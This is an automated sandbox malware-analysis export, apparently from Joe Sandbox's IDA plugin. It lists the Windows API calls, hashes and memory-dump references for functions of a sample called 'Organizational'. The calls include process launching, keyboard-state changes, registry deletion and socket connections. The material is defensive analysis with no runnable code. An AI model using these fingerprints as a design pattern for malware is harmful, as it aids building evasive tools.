• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: 014744c1cb766cd948195a3b43b98850db1d8fbe68127cc325d69a5127a1442d
• Instruction ID: 709cca0ea8c72ee14e6369088172ed9fea1b938b48acabfd0ac696567bdc4fba
• Opcode Fuzzy Hash: 014744c1cb766cd948195a3b43b98850db1d8fbe68127cc325d69a5127a1442d
• Instruction Fuzzy Hash: 35718034A04205AFEB25AF54C8D4FFA77A5EF8A320F14805AFD4997251CB35AC50FB52
APIs
• _memset.LIBCMT ref: 00F6FB31
• _memset.LIBCMT ref: 00F6FBFA
• ShellExecuteExW.SHELL32(?), ref: 00F6FC3F
  • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
  • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
  • Part of subcall function 00F0436A: _wcscpy.LIBCMT ref: 00F0438D
• GetProcessId.KERNEL32(00000000), ref: 00F6FCB6
• CloseHandle.KERNEL32(00000000), ref: 00F6FCE5
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
• Opcode ID: 6d23804e2862fe582e38997ab4ca6403ee4e932b51a633fa9325f72d1c4f323a
• Instruction ID: 4c8bf1341c6ff6a680067d41703639cdbf9701d1ca7d0735e6602c32519893d3
• Opcode Fuzzy Hash: 6d23804e2862fe582e38997ab4ca6403ee4e932b51a633fa9325f72d1c4f323a
• Instruction Fuzzy Hash: 8361DFB5A00619DFCB14EF94D8909AEB7F4FF48310F108469E906BB391CB35AE45EB90
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00F5178B
                                                    • GetKeyboardState.USER32(?), ref: 00F517A0
                                                    • SetKeyboardState.USER32(?), ref: 00F51801
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F5182F
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F5184E
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F51894
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F518B7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: bdf18f27c1b31f4d3705923af174381d3bfb2fed6177cefde4d2ec58a4d1ff95
                                                    • Instruction ID: aa97f281ef3a79d34f915222394341ada83eee5a4308103fe1aa3f97bb102020
                                                    • Opcode Fuzzy Hash: bdf18f27c1b31f4d3705923af174381d3bfb2fed6177cefde4d2ec58a4d1ff95
                                                    • Instruction Fuzzy Hash: 7F51D360A047D53DFB364228CC55BB67EE97B06316F088589EAD5458C2D698BC8CE750
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 00F515A4
                                                    • GetKeyboardState.USER32(?), ref: 00F515B9
                                                    • SetKeyboardState.USER32(?), ref: 00F5161A
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F51646
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F51663
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F516A7
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F516C8
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: abde03f109f4bf9d71fe481a4e202bc3e66b4f139a6df989f8ed7ae749fcea08
                                                    • Instruction ID: d285c79b89b250a9e5f5f392232abbf1002ec8465baeb4ba3fb1a8c284950950
                                                    • Opcode Fuzzy Hash: abde03f109f4bf9d71fe481a4e202bc3e66b4f139a6df989f8ed7ae749fcea08
                                                    • Instruction Fuzzy Hash: DA5103A0A047D53DFB3283248C45BBA7EA97B46312F0C4589EAD5468C2D7A8FC9CF750
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalTime
                                                    • String ID:
                                                    • API String ID: 2945705084-0
                                                    • Opcode ID: 7ddd32d31fcaf75b9e9befc312b2b3c0832c40b41d0ed59bea1c93a06e254b0b
                                                    • Instruction ID: 9571ec3390ec45463b3da53b5d8f012f6f0ea7de5441f3e3fb4d5a0ea06ec0b9
                                                    • Opcode Fuzzy Hash: 7ddd32d31fcaf75b9e9befc312b2b3c0832c40b41d0ed59bea1c93a06e254b0b
                                                    • Instruction Fuzzy Hash: EC419076C1061875CB51FBF4CC4A9CFB3B8AF04311F518856E909E3221E738A3A9D3A6
                                                    APIs
                                                      • Part of subcall function 00F54BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F53B8A,?), ref: 00F54BE0
                                                      • Part of subcall function 00F54BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F53B8A,?), ref: 00F54BF9
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F53BAA
                                                    • _wcscmp.LIBCMT ref: 00F53BC6
                                                    • MoveFileW.KERNEL32(?,?), ref: 00F53BDE
                                                    • _wcscat.LIBCMT ref: 00F53C26
                                                    • SHFileOperationW.SHELL32(?), ref: 00F53C92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 1377345388-1173974218
                                                    • Opcode ID: b825bbfa6a26a2fa344a4364580fbdc206233bd65f41a57ecff50b429a13e601
                                                    • Instruction ID: 9ec7cba2e7d19e38341ff29cc6463f3da6961f8b5c3bde3f4dba693b86989dad
                                                    • Opcode Fuzzy Hash: b825bbfa6a26a2fa344a4364580fbdc206233bd65f41a57ecff50b429a13e601
                                                    • Instruction Fuzzy Hash: 6941847250C344AAC751EF68D845ADBB7ECAF89391F40092EF989C3151EB38D68CE752
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F778CF
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F77976
                                                    • IsMenu.USER32(?), ref: 00F7798E
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F779D6
                                                    • DrawMenuBar.USER32 ref: 00F779E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                    • String ID: 0
                                                    • API String ID: 3866635326-4108050209
                                                    • Opcode ID: 6e665ec95f23593840ebb683e34346e96fe1954fd00af02648cac98eda8341bc
                                                    • Instruction ID: e6f43b00fec7cc4ecf0743846396147ef56a925a990e6a1af7f61632ec32586d
                                                    • Opcode Fuzzy Hash: 6e665ec95f23593840ebb683e34346e96fe1954fd00af02648cac98eda8341bc
                                                    • Instruction Fuzzy Hash: DF416C75A15348EFDB10EF54D884EAABBF5FB05320F04812AEA599B250C730AD50EFA1
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F71631
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F7165B
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00F71712
                                                      • Part of subcall function 00F71602: RegCloseKey.ADVAPI32(?), ref: 00F71678
                                                      • Part of subcall function 00F71602: FreeLibrary.KERNEL32(?), ref: 00F716CA
                                                      • Part of subcall function 00F71602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F716ED
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F716B5
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: 42c33168dd0237560439cf4b0adca5b68d37178b0c6c8abe76f5763e08ef49cb
                                                    • Instruction ID: 53907b7c1051ca1c602a9e0fdf995a7d377db74afead44803b57df2a4da6f6f6
                                                    • Opcode Fuzzy Hash: 42c33168dd0237560439cf4b0adca5b68d37178b0c6c8abe76f5763e08ef49cb
                                                    • Instruction Fuzzy Hash: A7313AB190010DBFEB149B94DC89EFEB7BCFF08310F50416AE905A2140EA749E49ABA1
                                                    APIs
                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00F76911
                                                    • GetWindowLongW.USER32(01464A90,000000F0), ref: 00F76944
                                                    • GetWindowLongW.USER32(01464A90,000000F0), ref: 00F76979
                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00F769AB
                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00F769D5
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F769E6
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F76A00
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: e7f1ba30b783e1f4c647b4737bbc3cea6b8ee6a5ae282e4cfc1dee2754350084
                                                    • Instruction ID: 07b08457c2a2ab07f755cfd4e4f3f3ee2927aa2257f9e420294cb0db142de66b
                                                    • Opcode Fuzzy Hash: e7f1ba30b783e1f4c647b4737bbc3cea6b8ee6a5ae282e4cfc1dee2754350084
                                                    • Instruction Fuzzy Hash: 33313830A046599FDB20DF18DC88F6437E1EB89320F2841A5F608CB2B2CB71EC54EB52
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F4E2CA
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F4E2F0
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00F4E2F3
                                                    • SysAllocString.OLEAUT32(?), ref: 00F4E311
                                                    • SysFreeString.OLEAUT32(?), ref: 00F4E31A
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00F4E33F
                                                    • SysAllocString.OLEAUT32(?), ref: 00F4E34D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 56e6604cfe5c9cf5137ede2a259cb61f1a0a369881388d0ab95027d9652df67a
                                                    • Instruction ID: 3a855742f0cbebc8631fb472e5e1d95a05bdd5d5f4eab4ecaa4b4dec4f4cd357
                                                    • Opcode Fuzzy Hash: 56e6604cfe5c9cf5137ede2a259cb61f1a0a369881388d0ab95027d9652df67a
                                                    • Instruction Fuzzy Hash: 33217476A0421DAF9B50DFA8DC88DBA7BACFF08360B444125FE14DB250DA70AD85A760
                                                    APIs
                                                      • Part of subcall function 00F68475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F684A0
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F668B1
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F668C0
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F668F9
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00F66902
                                                    • WSAGetLastError.WSOCK32 ref: 00F6690C
                                                    • closesocket.WSOCK32(00000000), ref: 00F66935
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F6694E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 910771015-0
                                                    • Opcode ID: 7a9015f529e1a325e96e6a25f49cbd40bf98bf9aecefe779692b60507d7a9114
                                                    • Instruction ID: f9ea7a996c04ef93e4de6920d1dd82443c3a98d0cb066cd6a455f1ccdb05c4eb
                                                    • Opcode Fuzzy Hash: 7a9015f529e1a325e96e6a25f49cbd40bf98bf9aecefe779692b60507d7a9114
                                                    • Instruction Fuzzy Hash: B031B171600208AFDB10AF64CC85FBE77A9EF44721F044129FE05EB2D1CB74AC44ABA1
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F4E3A5
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F4E3CB
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00F4E3CE
                                                    • SysAllocString.OLEAUT32 ref: 00F4E3EF
                                                    • SysFreeString.OLEAUT32 ref: 00F4E3F8
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00F4E412
                                                    • SysAllocString.OLEAUT32(?), ref: 00F4E420
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 3dbf11494d6b0c9b0220edcf9817bbdb1cd02d9823a05d02bf648c4ae528e139
                                                    • Instruction ID: 7f4b92e5842d22cd1b77405e27658d0c519f16bc7b540fd138120b9071c40c04
                                                    • Opcode Fuzzy Hash: 3dbf11494d6b0c9b0220edcf9817bbdb1cd02d9823a05d02bf648c4ae528e139
                                                    • Instruction Fuzzy Hash: E4216536604108AF9B50DFA8DC88DBA7BECFF08370B408525FD05CB260DA75AC85AB64
                                                    APIs
                                                      • Part of subcall function 00EF2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EF214F
                                                      • Part of subcall function 00EF2111: GetStockObject.GDI32(00000011), ref: 00EF2163
                                                      • Part of subcall function 00EF2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EF216D
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F77C57
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F77C64
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F77C6F
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F77C7E
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F77C8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: 7aabf7a86e5e71a7cd6330dd19a2e740d297e8d70b4da59516432ea7ae9c8f4e
                                                    • Instruction ID: 90cc8a4a1ce9257a15e8be28b51386332a321038b782d67b0c0ee9359b3e8616
                                                    • Opcode Fuzzy Hash: 7aabf7a86e5e71a7cd6330dd19a2e740d297e8d70b4da59516432ea7ae9c8f4e
                                                    • Instruction Fuzzy Hash: 521182B255021DBEEF159F60CC85EE77F5DEF087A8F018115BB08A6090CB729C21EBA4
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00F14282,?), ref: 00F141D3
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00F141DA
                                                    • EncodePointer.KERNEL32(00000000), ref: 00F141E6
                                                    • DecodePointer.KERNEL32(00000001,00F14282,?), ref: 00F14203
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoInitialize$combase.dll
                                                    • API String ID: 3489934621-340411864
                                                    • Opcode ID: 9cc7272baac5280444369f35580dc50a19a6874ae8ec383b7f8198f1af03cb91
                                                    • Instruction ID: 440a95a1751303628bc7abd09fe68a33aa33c06ac6f8c83a3a2571e7718215a0
                                                    • Opcode Fuzzy Hash: 9cc7272baac5280444369f35580dc50a19a6874ae8ec383b7f8198f1af03cb91
                                                    • Instruction Fuzzy Hash: 7DE01A71A90709AFEB912B78EC8DBA83664BB51F06FA04524F401E50F0DFB95488BF00
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F141A8), ref: 00F142A8
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00F142AF
                                                    • EncodePointer.KERNEL32(00000000), ref: 00F142BA
                                                    • DecodePointer.KERNEL32(00F141A8), ref: 00F142D5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 3489934621-2819208100
                                                    • Opcode ID: 5b12b73368b27510f835d46cea1271f700dbc4dd16634ecda3e43b1448c416ba
                                                    • Instruction ID: ffe8d30876aee2473c8f0d6bc10fbeb59c31d08b67ef24f3b5bdc156ef50920f
                                                    • Opcode Fuzzy Hash: 5b12b73368b27510f835d46cea1271f700dbc4dd16634ecda3e43b1448c416ba
                                                    • Instruction Fuzzy Hash: 44E0B671950B18ABEB91AB64ED4DBD43A68BB40F12F904215F001E51B0CBB89588FF11
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 00EF21B8
                                                    • GetWindowRect.USER32(?,?), ref: 00EF21F9
                                                    • ScreenToClient.USER32(?,?), ref: 00EF2221
                                                    • GetClientRect.USER32(?,?), ref: 00EF2350
                                                    • GetWindowRect.USER32(?,?), ref: 00EF2369
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Rect$Client$Window$Screen
                                                    • String ID:
                                                    • API String ID: 1296646539-0
                                                    • Opcode ID: e0d37380fa69f88838857c610957c73df82991b7a888f4092475f426e3b5c6b1
                                                    • Instruction ID: 955c6082e3c45719821e94949ab65dbeac70008f2465e8eb85a21cc3d05f0a5d
                                                    • Opcode Fuzzy Hash: e0d37380fa69f88838857c610957c73df82991b7a888f4092475f426e3b5c6b1
                                                    • Instruction Fuzzy Hash: 8CB17B7990064EDBDF10CFA8C9807EDB7B1FF08314F149129EE59AB254EB34AA50DB64
                                                    APIs
                                                    Memory Dump Source
